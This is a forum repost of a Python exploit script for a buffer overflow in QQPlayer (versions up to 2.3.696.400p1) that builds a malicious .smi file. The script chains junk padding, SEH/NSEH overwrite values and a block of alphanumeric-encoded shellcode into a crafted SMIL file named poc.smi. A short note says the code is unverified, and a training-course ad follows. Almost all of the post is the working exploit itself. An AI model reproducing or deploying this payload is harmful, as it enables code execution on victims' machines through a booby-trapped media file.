-
-
[转帖]QQPlayer smi File Buffer Overflow Exploit
-
2010-7-28 15:53 3511
-
################################################################# # # Title: QQPlayer smi File Buffer Overflow Exploit # Author: Lufeng Li of Neusoft Corporation # Vendor: www.qq.com # Platform: Windows XPSP3 Chinese Simplified # Tested: QQPlayer 2.3.696.400p1 # Vulnerable: QQPlayer<=2.3.696.400p1 # ################################################################# # Code : head ='''<smil> <head> <meta name="title" content="_"/> <meta name="author" content="Warner Music Group''' junk = "A" * 2001 nseh ="\x42\x61\x21\x61" seh ="\x39\x0c\x41\x00" adjust="\x30\x83\xc0\x0b" shellcode=("PYIIIIIIIIIIQZVTX30VX4AP0A3HH0A00ABAABTAAQ2AB2BB0BBXP8ACJJIKLM8LI5PUPUPSPMYZEV" "QN2BDLKPRVPLKQB4LLK0RR4LKSBWX4ONW1ZWVFQKO6QO0NLWL3QSLS26L7PIQ8ODM5QIWKRZPPRQGL" "KQB4PLKPB7L5QXPLKQP2XK5IP44QZ5QXPPPLKQX4XLKQHGPUQN3KSGLQYLKP4LKUQ9FFQKOVQO0NL9" "QXODM5QYWFXKPD5JT4C3MZXWK3MWTT5KRPXLKQHWTEQ8SCVLKTLPKLKQH5LEQN3LKS4LKC1XPMY1TW" "TGT1KQKSQ0YPZ0QKOKP0XQOQJLKTRJKMVQMCZUQLMLEOIUPUPC0PPRHP1LKROLGKON5OKZPNUORF6R" "HOVLUOMMMKOIE7LC6SLUZMPKKM0BU5UOKQWB32R2ORJ5PPSKOHUE3512LSS6N3U2X3UUPDJA") junk_="R"*8000 foot ='''"/> </head> <body> <seq> <video src="rtsp://sos08-1-rm.eams.net/lis/424444/.uid.M0001" title="_"fill="freeze"/> </seq> </body> </smil> <!-- Generated by Akamai Stream OS BOSS (v10.0.14-20100129) / d366992c -->''' payload=head+junk+nseh+seh+adjust+shellcode+junk_+foot fobj = open("poc.smi","w") fobj.write(payload) fobj.close()
代码未验证
[培训]二进制漏洞攻防(第3期);满10人开班;模糊测试与工具使用二次开发;网络协议漏洞挖掘;Linux内核漏洞挖掘与利用;AOSP漏洞挖掘与利用;代码审计。
赞赏
他的文章
看原图